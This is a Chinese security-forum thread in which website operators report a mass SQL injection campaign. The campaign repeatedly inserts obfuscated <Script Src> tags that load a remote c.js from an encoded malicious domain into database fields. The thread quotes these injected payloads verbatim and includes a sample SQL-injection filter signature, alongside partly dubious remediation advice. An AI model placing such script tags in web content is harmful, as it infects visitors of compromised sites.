瑞星卡卡安全论坛

具体表现为:
网站数据库的数据表的用户信息后面被写入"！<Script Src=http://c.nuc%6Cear3.com/css/c.js></Script><Script Src=http://c.%6E%75clear3.com/css/c.js></Script>"
删除了其代码又自动生成...

最新特征：

1、用户发布新信息内容后在5个小时左右，在数据表的相关字段写入“<Script Src=http://c.nuc%6Cear3.com/css/c.js></Script>“
2、删除代码后第一次在用户信息内容里被写入的是"</Script><Script Src=http://c.%6E%75clear3.com/css/c.js></Script>"过几个小时后写入两段就成“<Script Src=http://c.nuc%6Cear3.com/css/c.js></Script><Script Src=http://c.%6E%75clear3.com/css/c.js></Script>”再过几个小时后写入3段就成“.<Script Src=http://c.nuc%6Cear3.com/css/c.js></Script><Script Src=http://c.%6E%75clear3.com/css/c.js></Script><Script Src=http://c.nucl%65%61r3.com/css/c.js></Script>”


例子网站:

华派信息网(http://www.hp5e.com)

望专家尽快作出解决方案,以免更多网站受其害!

用户系统信息：Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)

sql注入，应该与系统80端口被攻击有关，需要先清除恶意代码，之后升级杀毒软件查杀，
若查杀无效，建议扫SRENG日志发这论坛来
下载SRENG2.6版工具：http://www.kztechs.com/sreng/download.html
SRENG工具的扫描日志操作，看这贴2楼：http://bbs.ikaka.com/showtopic-8442813.aspx

该用户帖子内容已被屏蔽

瑞星防毒墙,对这次的攻击是防不住了！

SQL注入通常是通过80端口提交的一段数据库查询语句，和正常的web访问没什么区别，防毒墙一般不可能把web服务器的80端口给封了。查查 IIS的日志吧，也许能发现一些攻击的行为。当然网站如果存在SQL注入点，还是尽量检查出来并消除吧。

我和楼主一样，也遇到了这个人的功击！

目前也还没有找出解决办法，请高手们帮帮忙

防毒墙是硬件~~不是软件~呵呵

该用户帖子内容已被屏蔽

我也有这毛病:default1:

keesun 的自身代码不完善～  你应该去找他们～

同样的问题，这几天我查看了很多帖子,都是这个问题，起码上千人吧,望高手指点。加入QQ交流群6658539

如果是SQL注入的话，那你的每个文件都会有乱码的,如果只是一些打开页面有,而文件里没有的话，就不会是SQL注入,因为如果是SQL注入的话，它会破坏你的整个数据.根据这几天的经验，应该是我们的页面文件夹里有个木马文件，目前杀度软件杀不出来.有可能在根目录下,仔细检查,打开看是否是乱码,也有可能在你的UPFILE文件里，有诸如ASA ASP等文件ASP木马不易察觉，仔细检查!QQ交流群6658539

最好排除服务器本身的安全漏洞 操作系统漏洞或者SQL SERVER服务漏洞
只有解决服务器和你程序本身存在的安全漏洞才能保证不出现此类问题
关于你的这个问题 我以前看到过类似的 情况 建议你看看你在首页是否嵌入了其他网站提供的统计功能 一些小网站提供的统计功能有安全问题 导致首页嵌入病毒代码

ddddddddddddddddddddddddddddddddddddddd

该用户帖子内容已被屏蔽

软硬件结合才是最安全的

在连接数据库的文件里 写入判断
如果发现有 select  update and ' 等 特殊字符（先转换大小写）
如果关闭 

马上改数据库密码

该用户帖子内容已被屏蔽

http://bbs.ikaka.com/showtopic-8606956.aspx

我们nsfocus的waf和ips都能防住

我不知道这里面说的防火墙能解码到几层，如果应用层还行，如果到4层的，根本不用谈了就
sql注入要用特征匹配去过滤
举个例子：  or\xa1\xaf*=  就像这种的
有的软件也可以做到保护，但原理一样，就是检查get请求字段，匹配特征的就cut
据我所知，都是收费的软件